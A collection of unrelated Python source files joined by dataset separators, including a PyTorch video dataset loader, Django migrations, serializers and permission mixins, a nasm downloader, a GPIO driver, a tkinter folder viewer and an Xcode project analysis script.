vidor_dataset_list = []
if task == 'action':
with open('actions.json', 'r') as action_f:
actions = json.load(action_f)['actions']
for each_split in splits:
print('Preparing: ', each_split)
get_index_list = vidor_dataset.get_index(each_split)
pbar = tqdm(total=len(get_index_list))
for ind in get_index_list:
for each_ins in vidor_dataset.get_action_insts(ind):
video_path = vidor_dataset.get_video_path(ind)
start_f, end_f = each_ins['duration']
label = np.full((1, end_f - start_f), actions.index(each_ins['category']))
vidor_dataset_list.append((video_path, label, start_f, end_f))
pbar.update(1)
pbar.close()
return vidor_dataset_list
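# Each element of the returned list is a tuple
# (video_path, label, start_frame, end_frame), where label is a (1, T) numpy
# array filled with the action-class index for every frame of the instance.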
class VidorPytorchTrain(data_utl.Dataset):
def __init__(self, anno_rpath, splits, video_rpath,
frames_rpath, mode, save_dir, task='action',
transforms=None, low_memory=True):
self.data = make_vidor_dataset(
anno_rpath=anno_rpath,
splits=splits,
video_rpath=video_rpath,
task=task,
low_memory=low_memory)
self.frames_rpath = frames_rpath
self.transforms = transforms
self.mode = mode
self.task = task
self.save_dir = save_dir
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
video_path, label, start_f, end_f = self.data[index]
vid_paths = video_path.split('/')
img_dir_path = os.path.join(self.frames_rpath, vid_paths[-2], vid_paths[-1][:-4])
if os.path.exists(img_dir_path):
if self.mode == 'rgb':
imgs = load_rgb_frames(video_path=video_path,
image_dir=self.frames_rpath,
begin=start_f,
end=end_f)
else:
# imgs = load_flow_frames(self.root, vid, start_f, 64)
print('not supported')
# label = label[:, start_f: end_f]
imgs = self.transforms(imgs)
# return video_to_tensor(imgs), 0 # correct
# return 0, torch.from_numpy(label) # runtimeError sizes must be non-negative
return video_to_tensor(imgs), torch.from_numpy(label)
return 0, 0
def __len__(self):
return len(self.data)
class VidorPytorchExtract(data_utl.Dataset):
def __init__(self, anno_rpath, save_dir, splits,
video_rpath, frames_rpath, mode, task='action',
transforms=None, low_memory=True):
self.data = make_vidor_dataset(
anno_rpath=anno_rpath,
splits=splits,
video_rpath=video_rpath,
task=task,
low_memory=low_memory)
self.frames_rpath = frames_rpath
self.splits = splits
self.transforms = transforms
self.mode = mode
self.save_dir = save_dir
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
video_path, label, start_f, end_f = self.data[index]
vid_paths = video_path.split('/')
img_dir_path = os.path.join(self.frames_rpath, vid_paths[-2], vid_paths[-1][:-4])
if os.path.exists(img_dir_path + '.npy'):
return 0, 0, vid_paths[-2], vid_paths[-1][:-4]
if os.path.exists(img_dir_path):
if self.mode == 'rgb':
imgs = load_rgb_frames(video_path=video_path,
image_dir=self.frames_rpath,
begin=start_f,
end=end_f)
else:
# imgs = load_flow_frames(self.root, vid, start_f, 64)
print('not supported')
imgs = self.transforms(imgs)
return video_to_tensor(imgs), torch.from_numpy(label), vid_paths[-2], vid_paths[-1][:-4]
return -1, -1, vid_paths[-2], vid_paths[-1][:-4]
def __len__(self):
return len(self.data)
if __name__ == '__main__':
import videotransforms
from torchvision import transforms
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-where', type=str, default="local")
parser.add_argument('-split', type=str, default="test")
parser.add_argument('-dataset', type=str, default='ext')
args = parser.parse_args()
local_anno_rpath = '/home/daivd/PycharmProjects/vidor/annotation'
local_video_rpath = '/home/daivd/PycharmProjects/vidor/test_vids'
gpu_anno_rpath = '/storage/dldi/PyProjects/vidor/annotation'
gpu_video_rpath = '/storage/dldi/PyProjects/vidor/train_vids'
mode = 'rgb'
save_dir = 'output/features/'
low_memory = True
batch_size = 1
train_transforms = transforms.Compose([videotransforms.RandomCrop(224),
videotransforms.RandomHorizontalFlip()])
test_transforms = transforms.Compose([videotransforms.CenterCrop(224)])
task = 'action'
if args.dataset == 'train':
Dataset = VidorPytorchTrain
else:
Dataset = VidorPytorchExtract
if args.where == 'gpu':
anno_rpath = gpu_anno_rpath
video_rpath = gpu_video_rpath
frames_rpath = 'data/Vidor_rgb/JPEGImages/'
else:
anno_rpath = local_anno_rpath
video_rpath = local_video_rpath
frames_rpath = '/home/daivd/PycharmProjects/vidor/Vidor_rgb/JPEGImages/'
if args.split == 'train':
dataset = Dataset(anno_rpath=anno_rpath,
splits=['training'],
video_rpath=video_rpath,
mode=mode,
task=task,
save_dir=save_dir,
frames_rpath=frames_rpath,
transforms=train_transforms,
low_memory=low_memory)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=36,
pin_memory=True)
else:
val_dataset = Dataset(anno_rpath=anno_rpath,
splits=['validation'],
video_rpath=video_rpath,
mode=mode,
save_dir=save_dir,
frames_rpath=frames_rpath,
task=task,
transforms=test_transforms,
low_memory=low_memory)
dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=True, num_workers=36,
pin_memory=True)
for data in dataloader:
# get the inputs
inputs, labels, a, b = data
if inputs.tolist()[0] != -1:
print(inputs.size()) # torch.Size([1, 3, 4, 224, 224])
print(labels.size()) # torch.Size([1, 1, 4])
| StarcoderdataPython |
137403 | <filename>sample_app/tasks/features/environment.py<gh_stars>1-10
import uuid
from django.core.management import call_command
from toolkit.helpers.bdd import setup_test_environment
from toolkit.helpers.utils import snakify
# The scenario param is used behind the scenes
def before_scenario(context, scenario):
setup_test_environment(context, scenario)
call_command('flush', verbosity=0, interactive=False)
call_command('loaddata', 'auth.json')
def after_step(context, step):
# Take a screenshot if the step failed
if step.status == "failed":
file_path = '%s_%s_%s.png' % (snakify(context.scenario),
snakify(step.name),
uuid.uuid4())
context.browser.driver.save_screenshot(file_path)
def after_scenario(context, scenario):
call_command('flush', verbosity=0, interactive=False)
# Close the browser to get a fresh one for each test
context.browser.quit()
context.browser = None # Flush browser from context
context.display.stop() # Closes the virtual display | StarcoderdataPython |
3235832 | # Generated by Django 3.1.13 on 2021-11-09 13:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0106_descrierepage_sistem_structural_observatii'),
]
operations = [
migrations.RemoveField(
model_name='bisericapage',
name='adresa',
),
migrations.RemoveField(
model_name='bisericapage',
name='conservare',
),
migrations.RemoveField(
model_name='bisericapage',
name='datare_an',
),
migrations.RemoveField(
model_name='bisericapage',
name='datare_prin_interval_timp',
),
migrations.RemoveField(
model_name='bisericapage',
name='datare_secol',
),
migrations.RemoveField(
model_name='bisericapage',
name='judet',
),
migrations.RemoveField(
model_name='bisericapage',
name='latitudine',
),
migrations.RemoveField(
model_name='bisericapage',
name='localitate',
),
migrations.RemoveField(
model_name='bisericapage',
name='longitudine',
),
migrations.RemoveField(
model_name='bisericapage',
name='prioritizare',
),
migrations.RemoveField(
model_name='bisericapage',
name='valoare',
),
migrations.AddField(
model_name='conservarepage',
name='total',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='valoarepage',
name='total',
field=models.FloatField(null=True),
),
]
| StarcoderdataPython |
1635614 | <filename>api/serializers/image.py
from rest_framework import serializers
from api.fields import Base64StringField
from election.models import Image
class ImageSerializer(serializers.ModelSerializer):
base64Image = Base64StringField(source='file', allow_null=True)
class Meta:
model = Image
fields = ('id', 'base64Image', 'name')
| StarcoderdataPython |
1790343 | <gh_stars>100-1000
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Downloads and installs nasm in a temporary directory."""
import logging
import os
import shutil
import subprocess
import sys
import tempfile
import urllib.parse
import urllib.request
import zipfile
# pylint: disable=g-import-not-at-top
# pylint: disable=W0403
sys.path.append(os.path.dirname(__file__))
import shell
# pylint: enable=g-import-not-at-top
# pylint: enable=W0403
NASM_ZIP_NAME = 'nasm.zip'
class NasmInstaller:
"""Installs nasm into a temporary directory."""
def __init__(self, installer_url: str, installer_dir: str = None):
"""Initialize the installer instance.
Args:
installer_url: URL to the nasm installer.
installer_dir: Optional path to copy nasm.
"""
self._installer_url = installer_url
if not installer_dir:
self._installer_dir = tempfile.TemporaryDirectory().name
else:
self._installer_dir = installer_dir
# Add nasm installation directory to path.
os.environ['PATH'] = (self._installer_dir + os.path.pathsep +
os.environ['PATH'])
@property
def installer_path(self):
"""Get the path where nasm is going to be installed."""
return self._installer_dir
def install(self):
"""Install nasm to project.
Returns:
True when installed, false otherwise.
Raises:
urllib.error.URLError: If an error occurs while downloading the
installer.
zipfile.BadZipFile: if unzipping fails.
subprocess.CalledProcessError: If failed to set path.
"""
# Download installer.
installer_filename = self._download()
if installer_filename:
# Unzip installer.
self._unzip(installer_filename)
# Add installer to path.
self._check_nasm()
return True
return False
def _download(self) -> str:
"""Download the installer and places into temporary folder.
Returns:
Path to the downloaded installer.
Raises:
urllib.error.URLError: If an error occurs while downloading the
installer.
"""
if not self._installer_url:
return ''
    # Create the installation directory if it doesn't exist.
os.makedirs(self._installer_dir, exist_ok=True)
installer_filename = os.path.join(self._installer_dir, NASM_ZIP_NAME)
with open(installer_filename, 'wb') as installer_file:
logging.info('Copying %s --> %s', self._installer_url, installer_filename)
with urllib.request.urlopen(self._installer_url) as urlfile:
shutil.copyfileobj(urlfile, installer_file)
return installer_filename
def _unzip(self, zip_path: str) -> bool:
"""Unzips nasm package.
Args:
zip_path: Path to the zip file.
Raises:
zipfile.BadZipFile: if unzipping fails.
"""
try:
with zipfile.ZipFile(zip_path) as handle:
for item_info in handle.infolist():
# Remove first folder, so nasm.exe can be found when setting PATH.
target_filename = os.path.join(
self._installer_dir,
os.path.join(*(
os.path.normpath(item_info.filename).split(os.path.sep)[1:])))
# Open the file inside zip and save it on the desired location.
with handle.open(item_info.filename, 'r') as input_file:
os.makedirs(os.path.dirname(target_filename), exist_ok=True)
with open(target_filename, 'wb') as output_file:
output_file.write(input_file.read())
except (zipfile.BadZipFile) as error:
logging.exception('Failed to unzip %s: %s', zip_path, error)
raise
def _check_nasm(self) -> str:
"""Check that nasm runs on cmd.
Raises:
subprocess.CalledProcessError: If failed to run nasm.
"""
try:
shell.run_command('nasm -h')
except subprocess.CalledProcessError as error:
logging.exception('Failed to add nasm to path: %s', error)
raise
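# Minimal usage sketch (the download URL below is illustrative only):
#
#   installer = NasmInstaller('https://example.com/nasm-win64.zip')
#   if installer.install():
#       print('nasm unpacked to', installer.installer_path)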
| StarcoderdataPython |
171784 | """
Linux Kernel 4.8+ libgpiod
"""
import threading
from datetime import datetime, timedelta
from typing import TYPE_CHECKING, Any, Callable, Dict, Optional
from ...types import ConfigType, PinType
from . import GenericGPIO, InterruptEdge, InterruptSupport, PinDirection, PinPUD
if TYPE_CHECKING:
# pylint: disable=import-error
import gpiod # type: ignore
# Requires libgpiod-devel, libgpiod
REQUIREMENTS = ("gpiod",)
CONFIG_SCHEMA = {
"chip": {"type": "string", "required": False, "default": "/dev/gpiochip0"}
}
class GPIO(GenericGPIO):
"""
Implementation of GPIO class for libgpiod (linux kernel >= 4.8).
"""
INTERRUPT_SUPPORT = InterruptSupport.SOFTWARE_CALLBACK
def setup_module(self) -> None:
# pylint: disable=import-outside-toplevel,import-error
import gpiod
self.io: gpiod = gpiod
self.chip = gpiod.chip(self.config["chip"])
self.pins: Dict[PinType, gpiod.line] = {}
self.interrupt_threads: Dict[PinType, threading.Thread] = {}
self.stop_event = threading.Event()
self.direction_map = {
PinDirection.INPUT: gpiod.line_request.DIRECTION_INPUT,
PinDirection.OUTPUT: gpiod.line_request.DIRECTION_OUTPUT,
}
self.interrupt_edge_map = {
InterruptEdge.RISING: gpiod.line_request.EVENT_RISING_EDGE,
InterruptEdge.FALLING: gpiod.line_request.EVENT_FALLING_EDGE,
InterruptEdge.BOTH: gpiod.line_request.EVENT_BOTH_EDGES,
}
def setup_pin(
self,
pin: PinType,
direction: PinDirection,
pullup: PinPUD,
pin_config: ConfigType,
initial: Optional[str] = None,
) -> None:
"""
Setup a pin as either input or output.
        pin: offset of the GPIO line to use
direction: input or output
pullup: pullup settings are not supported
"""
# Pullup settings are called bias in libgpiod and are only
# available since Linux Kernel 5.5. They are as of now not
# yet part of python3-gpiod.
line: "gpiod.line" = self.chip.get_line(pin)
line_request = self.io.line_request()
line_request.consumer = "mqtt-io"
line_request.request_type = self.direction_map[direction]
line.request(line_request)
if direction == PinDirection.OUTPUT and initial is not None:
line.set_value(1 if initial == "high" else 0)
self.pins[pin] = line
def setup_interrupt_callback(
self,
pin: PinType,
edge: InterruptEdge,
in_conf: ConfigType,
callback: Callable[..., None],
) -> None:
"""
        Install an interrupt callback function.
        pin: GPIO line to watch for interrupts
        edge: triggering edge: RISING, FALLING or BOTH
        in_conf: input config; its "bouncetime" entry is the minimum time in
            milliseconds between two reported interrupts
        callback: function to call when an interrupt occurs
"""
line_request = self.io.line_request()
line_request.consumer = "mqtt-io"
line_request.request_type = self.interrupt_edge_map[edge]
bouncetime: int = in_conf["bouncetime"]
int_thread = InterruptThread(
self.chip, pin, line_request, callback, bouncetime, self.stop_event
)
int_thread.start()
self.interrupt_threads[pin] = int_thread
def get_interrupt_value(self, pin: PinType, *args: Any, **kwargs: Any) -> bool:
# We established the pin's value in the InterruptThread, so we just give it back
pin_value: bool = kwargs["pin_value"]
return pin_value
def set_pin(self, pin: PinType, value: bool) -> None:
self.pins[pin].set_value(value)
def get_pin(self, pin: PinType) -> bool:
return bool(self.pins[pin].get_value())
def cleanup(self) -> None:
self.stop_event.set()
for thread in self.interrupt_threads.values():
thread.join(timeout=10)
class InterruptThread(threading.Thread):
"""
Thread that waits on interrupt events for a given pin, then calls the callback.
"""
def __init__(
self,
chip: "gpiod.chip",
pin: PinType,
line_request: "gpiod.line_request",
callback: Callable[..., None],
bouncetime: int,
stop_event: threading.Event,
):
super().__init__()
self.daemon = True
self.pin = pin
self.line: "gpiod.line" = chip.get_line(self.pin)
self.line.release()
self.line.request(line_request)
self.callback = callback
self.bouncetime = timedelta(milliseconds=bouncetime)
self.stop_event = stop_event
def run(self) -> None:
# pylint: disable=import-outside-toplevel,import-error
import gpiod
previous_event_time = datetime.now()
while not self.stop_event.is_set():
if not self.line.event_wait(timedelta(seconds=2)):
continue
event: gpiod.line_event = self.line.event_read()
now = datetime.now()
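            # Software debounce: drop events that arrive sooner than `bouncetime`
            # after the previously reported one.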
if now - previous_event_time < self.bouncetime:
continue
previous_event_time = now
pin_value = None
if event.event_type == gpiod.line_request.EVENT_RISING_EDGE:
pin_value = True
elif event.event_type == gpiod.line_request.EVENT_FALLING_EDGE:
pin_value = False
if pin_value is None:
# Poll the pin for its value :(
pin_value = bool(self.line.get_value())
self.callback(pin_value=pin_value)
| StarcoderdataPython |
1771910 | <reponame>dcmvdbekerom/exojax<filename>src/exojax/plot/__init__.py
__all__ = []
__version__ = "1.0.0"
__uri__ = ""
__author__ = "<NAME> and collaborators"
__email__ = "<EMAIL>"
__license__ = ""
__description__ = "plotting modules in exojax"
from exojax.plot.atmplot import (
plottau,
plotcf,
)
| StarcoderdataPython |
3315765 | import torch
from .mlp_kernel import MLPKernel
from .rbf_net import RBFNetKernel
| StarcoderdataPython |
1687447 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, <NAME> and contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer. Redistributions in binary
# form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with
# the distribution
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
from django.utils.translation import ugettext_lazy as _
from organizations.models import Organization
from organizations.models import OrganizationUser
class OrganizationMixin(object):
"""Mixin used like a SingleObjectMixin to fetch an organization"""
org_model = Organization
org_context_name = 'organization'
def get_org_model(self):
return self.org_model
def get_context_data(self, **kwargs):
kwargs.update({self.org_context_name: self.get_organization()})
return super(OrganizationMixin, self).get_context_data(**kwargs)
def get_object(self):
if hasattr(self, 'organization'):
return self.organization
organization_pk = self.kwargs.get('organization_pk', None)
self.organization = get_object_or_404(self.get_org_model(), pk=organization_pk)
return self.organization
get_organization = get_object # Now available when `get_object` is overridden
class OrganizationUserMixin(OrganizationMixin):
"""Mixin used like a SingleObjectMixin to fetch an organization user"""
user_model = OrganizationUser
org_user_context_name = 'organization_user'
def get_user_model(self):
return self.user_model
def get_context_data(self, **kwargs):
kwargs = super(OrganizationUserMixin, self).get_context_data(**kwargs)
kwargs.update({self.org_user_context_name: self.object,
self.org_context_name: self.object.organization})
return kwargs
def get_object(self):
""" Returns the OrganizationUser object based on the primary keys for both
the organization and the organization user.
"""
if hasattr(self, 'organization_user'):
return self.organization_user
organization_pk = self.kwargs.get('organization_pk', None)
user_pk = self.kwargs.get('user_pk', None)
self.organization_user = get_object_or_404(
self.get_user_model().objects.select_related(),
user__pk=user_pk, organization__pk=organization_pk)
return self.organization_user
class MembershipRequiredMixin(object):
"""This mixin presumes that authentication has already been checked"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
self.organization = self.get_organization()
if not self.organization.is_member(request.user) and not \
request.user.is_superuser:
raise PermissionDenied(_("Wrong organization"))
return super(MembershipRequiredMixin, self).dispatch(request, *args,
**kwargs)
class AdminRequiredMixin(object):
"""This mixin presumes that authentication has already been checked"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
self.organization = self.get_organization()
if not self.organization.is_admin(request.user) and not \
request.user.is_superuser:
raise PermissionDenied(_("Sorry, admins only"))
return super(AdminRequiredMixin, self).dispatch(request, *args,
**kwargs)
class OwnerRequiredMixin(object):
"""This mixin presumes that authentication has already been checked"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
self.organization = self.get_organization()
# if self.organization.owner.organization_user.user != request.user and not request.user.is_superuser:
if self.organization.owner.organization_user.user != request.user:
if not request.user.is_superuser:
raise PermissionDenied(_("You are not the organization owner"))
return super(OwnerRequiredMixin, self).dispatch(request, *args, **kwargs)
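# Minimal usage sketch (the view and template names are hypothetical, not part
# of this module):
#
#   class OrganizationDetail(MembershipRequiredMixin, OrganizationMixin, DetailView):
#       template_name = 'organizations/detail.html'
#
# Mixin order matters: MembershipRequiredMixin.dispatch() calls
# self.get_organization(), which OrganizationMixin provides.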
| StarcoderdataPython |
1699807 | from django.urls import path
from .views import (
CustomLoginView,
DashboardView,
SingleApplicationView,
)
urlpatterns = [
path('login/', CustomLoginView.as_view(), name='login'),
path('', DashboardView.as_view(), name='dashboard'),
path('<int:pk>/', SingleApplicationView.as_view())
]
| StarcoderdataPython |
81256 | # -*- coding: utf-8 -*-
#
# Contributhon 2020 documentation build configuration file
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
#extensions = ['otcdocstheme']
# openstackdocstheme options
#repository_name = 'opentelekomcloud/otcdocstheme'
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'2020 Contributhon Documentation'
copyright = u'2020 Contributhon Contributors'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'otcdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# To use the API Reference sidebar dropdown menu,
# uncomment the html_theme_options parameter. The theme
# variable, sidebar_dropdown, should be set to `api_ref`.
# Otherwise, the list of links for the User and Ops docs
# appear in the sidebar dropdown menu.
#html_theme_options = {'show_other_versions': True}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static/css']
#---sphinx-themes-----
from jupyter_sphinx_theme import *
init_theme()
| StarcoderdataPython |
1743034 | <gh_stars>1-10
from keep_current_storage.shared import use_case as uc
from keep_current_storage.shared import response_object as res
class DocumentListUseCase(uc.UseCase):
def __init__(self, repo):
self.repo = repo
def process_request(self, request_object):
domain_document = self.repo.list(filters=request_object.filters)
return res.ResponseSuccess(domain_document)
class DocumentInsertUseCase(uc.UseCase):
def __init__(self, repo):
self.repo = repo
def process_request(self, request_object):
self.repo.insert_document(request_object.document)
return res.ResponseSuccess() | StarcoderdataPython |
90255 | from embedding_encoder.core import EmbeddingEncoder
__all__ = ["EmbeddingEncoder"]
| StarcoderdataPython |
194111 | from .compose import Compose
from .formating import Reformat
# from .loading import LoadAnnotations, LoadImageFromFile, LoadProposals
from .loading import *
from .test_aug import DoubleFlip
from .preprocess import Preprocess, Voxelization, AssignLabel, AssignTarget
__all__ = [
"Compose",
"to_tensor",
"ToTensor",
"ImageToTensor",
"ToDataContainer",
"Transpose",
"Collect",
"LoadImageAnnotations",
"LoadImageFromFile",
"LoadProposals",
"PhotoMetricDistortion",
"Preprocess",
"Voxelization",
"AssignTarget",
"AssignLabel",
"AssignTarget",
]
| StarcoderdataPython |
29567 | """
.. module:: django_core_models.locations.urls
:synopsis: django_core_models locations application urls module
django_core_models *locations* application urls module.
"""
from __future__ import absolute_import
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^addresses/$',
views.AddressList.as_view(),
name='address-list'),
url(r'^addresses/(?P<pk>[0-9]+)/$',
views.AddressDetail.as_view(),
name='address-detail'),
url(r'^address-types/$',
views.AddressTypeList.as_view(),
name='address-type-list'),
url(r'^address-types/(?P<pk>[0-9]+)/$',
views.AddressTypeDetail.as_view(),
name='address-type-detail'),
url(r'^cities/$',
views.CityList.as_view(),
name='city-list'),
url(r'^cities/(?P<pk>[0-9]+)/$',
views.CityDetail.as_view(),
name='city-detail'),
url(r'^countries/$',
views.CountryList.as_view(),
name='country-list'),
url(r'^countries/(?P<pk>[0-9]+)/$',
views.CountryDetail.as_view(),
name='country-detail'),
url(r'^distance-units/$', views.DistanceUnitList.as_view(),
name='distance-unit-list'),
url(r'^distance-units/(?P<pk>[0-9]+)/$',
views.DistanceUnitDetail.as_view(),
name='distance-unit-detail'),
url(r'^geographic-locations/$',
views.GeographicLocationList.as_view(),
name='geographic-location-list'),
url(r'^geographic-locations/(?P<pk>[0-9]+)/$',
views.GeographicLocationDetail.as_view(),
name='geographic-location-detail'),
url(r'^geographic-location-types/$',
views.GeographicLocationTypeList.as_view(),
name='geographic-location-type-list'),
url(r'^geographic-location-types/(?P<pk>[0-9]+)/$',
views.GeographicLocationTypeDetail.as_view(),
name='geographic-location-type-detail'),
url(r'^language-types/$',
views.LanguageTypeList.as_view(),
name='language-type-list'),
url(r'^language-types/(?P<pk>[0-9]+)/$',
views.LanguageTypeDetail.as_view(),
name='language-type-detail'),
url(r'^languages/$',
views.LanguageList.as_view(),
name='language-list'),
url(r'^languages/(?P<pk>[0-9]+)/$',
views.LanguageDetail.as_view(),
name='language-detail'),
url(r'^timezone-types/$',
views.TimezoneTypeList.as_view(),
name='timezone-type-list'),
url(r'^timezone-types/(?P<pk>[0-9]+)/$',
views.TimezoneTypeDetail.as_view(),
name='timezone-type-detail'),
url(r'^timezones/$',
views.TimezoneList.as_view(),
name='timezone-list'),
url(r'^timezones/(?P<pk>[0-9]+)/$',
views.TimezoneDetail.as_view(),
name='timezone-detail'),
    url(r'^provinces/$',
views.ProvinceList.as_view(),
name='province-list'),
    url(r'^provinces/(?P<pk>[0-9]+)/$',
views.ProvinceDetail.as_view(),
name='province-detail'),
url(r'^states/$',
views.StateList.as_view(),
name='state-list'),
url(r'^states/(?P<pk>[0-9]+)/$',
views.StateDetail.as_view(),
name='state-detail'),
]
| StarcoderdataPython |
3291282 | <gh_stars>0
import tkinter as tk # For tkinter Widgets
import os # For access to os properties such as path
from tkinter import ttk # Themed tkinter for beautiful interfaces
from tkinter import filedialog # Tkinter file dialog interface.
from tkinter import scrolledtext as scr # Scrolled Text Widget
# TODO: Recreate into a GUI class
win = tk.Tk()
win.minsize(200, 200) # Allows us to hold the application at a definite size
win.resizable(0,0) # Prevents increasing the size of the widget unless forced
win.title("Test Add Button") # Could be changed on any 'Test Commit'
"""Display Box is Global cause of it's accessibility on various levels"""
# TODO: Rephrase into a modular program
display_box = scr.ScrolledText(win, width=60, height=10)
display_box.grid(column=1, row=1, sticky=tk.NSEW)
"""Folder list is an actual folder list"""
folder_list = []
# This function enables the user to add folders to be accessed
def add_folder():
    """Enable the user to add folders to be accessed."""
# some highlighted variables are for test purposes only
""" I was finally able to make it default to HOME anytime by using 'tilde' '~' in 'initial dir'"""
folder_variable = filedialog.askdirectory(parent=win, initialdir='~', title='Select your Music and Videos folder')
## print(folder_variable)
# display_box.insert(tk.INSERT, folder_variable)
folder_list.append(folder_variable)
# Button = tk.Button(win, text="[]".format(folder_name), width=10, command=display_folder_contents)
# Button.grid(column=4, row=k)
# k += 1
## print(folder_list)
## display_box.insert(tk.INSERT, folder_list)
def display_folder_contents():
    """List the contents of every folder the user has added."""
    for folder in folder_list:
        for i in os.listdir(folder):
            # TODO: Fix the Display Box Output and organize it.
            # This activity of displaying the output into a scrolled text widget
            # comes out warped
            ## 'display_box.insert(tk.INSERT, i, "\n")'
            print(i)
# TODO: Fix the sub_folder selction and redirect output accordingly
# actual_file_list = selected_folder[j]
# print("The Contents of {} are: \n{}\n".format(selected_folder, actual_file_list))
# sprint(actual_file_list, "\n")
# TODO: Consider deleting these final lines
#for i in files:
# display_box.insert(tk.INSERT, i)
# print(i, "\n")
""" Two test buttons created for the test processes. """
add_button = ttk.Button(win, text="Add Folder", command = add_folder)
add_button.grid(column=0, row=1, sticky=tk.N)
view_button = ttk.Button(win, text="View Files", command = display_folder_contents)
view_button.grid(column=0, row=1, sticky=tk.S)
# TODO: Mainloop is just for the test phase
win.mainloop()
"""
if __name__ == '__main__': # This prototype would be used instead.
win.mainloop()
"""
# TODO: Rephrase everything into modules at the end of testing phase. | StarcoderdataPython |
1665279 | <gh_stars>1-10
#!/usr/bin/env python3
from termcolor import cprint
import argparse
import os
from xcanalyzer.xcodeproject.parsers import XcProjectParser
from xcanalyzer.xcodeproject.generators import OccurrencesReporter
from xcanalyzer.xcodeproject.exceptions import XcodeProjectReadException
from xcanalyzer.language.models import SwiftTypeType, ObjcTypeType
# --- Arguments ---
argument_parser = argparse.ArgumentParser(description="List all types that are unused in the project.")
# Project folder argument
argument_parser.add_argument('path',
help='Path of the folder containing your `.xcodeproj` folder.')
# App name
argument_parser.add_argument('app',
help='Name of the iOS app target.')
# Verbose
argument_parser.add_argument('-v', '--verbose',
dest='verbose',
action='store_true',
help='Verbose display.')
# Display files
argument_parser.add_argument('-d', '--display-files',
dest='display_files',
action='store_true',
help='Display files mode.')
# --- Parse arguments ---
args = argument_parser.parse_args()
# Argument: path => Remove ending slashes from path
path = args.path
while path and path[-1] == os.path.sep:
path = path[:-1]
# Xcode code project reader
xcode_project_reader = XcProjectParser(path, verbose=args.verbose)
# Loading the project
try:
xcode_project_reader.load()
# Parse Swift files
xcode_project_reader.parse_swift_files()
# Parse Objective-C files (always because Swift extension can be of objc types)
xcode_project_reader.parse_objc_files()
except XcodeProjectReadException as e:
print("An error occurred when loading Xcode project: {}".format(e.message))
exit()
# App target
app_target = xcode_project_reader.xc_project.target_with_name(args.app)
if not app_target:
raise ValueError("No app target found with name '{}'.".format(args.app))
# Find occurrences
swift_types = app_target.swift_types_dependencies_filtered(type_not_in={SwiftTypeType.EXTENSION})
objc_types = app_target.objc_types_dependencies_filtered(type_not_in={ObjcTypeType.CATEGORY, ObjcTypeType.CONSTANT}) # temporary exclude constants from objc types
type_occurrences_set = xcode_project_reader.find_type_occurrences_from_files(
# swift_types | objc_types,
objc_types,
from_target=app_target)
# Print occurrences for each type
occurrences_reporter = OccurrencesReporter()
occurrences_reporter.print_occurrences_of_multiple_types_in_files(type_occurrences_set, args.display_files)
# TODO:
# save/load cache for type occurrences
# report print really dead types: manage a mode:
# display all
# display only types with 0 outside occurrence
# display only types with exactly 1 inside occurrence (the declaration)
# ...
| StarcoderdataPython |
1675334 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
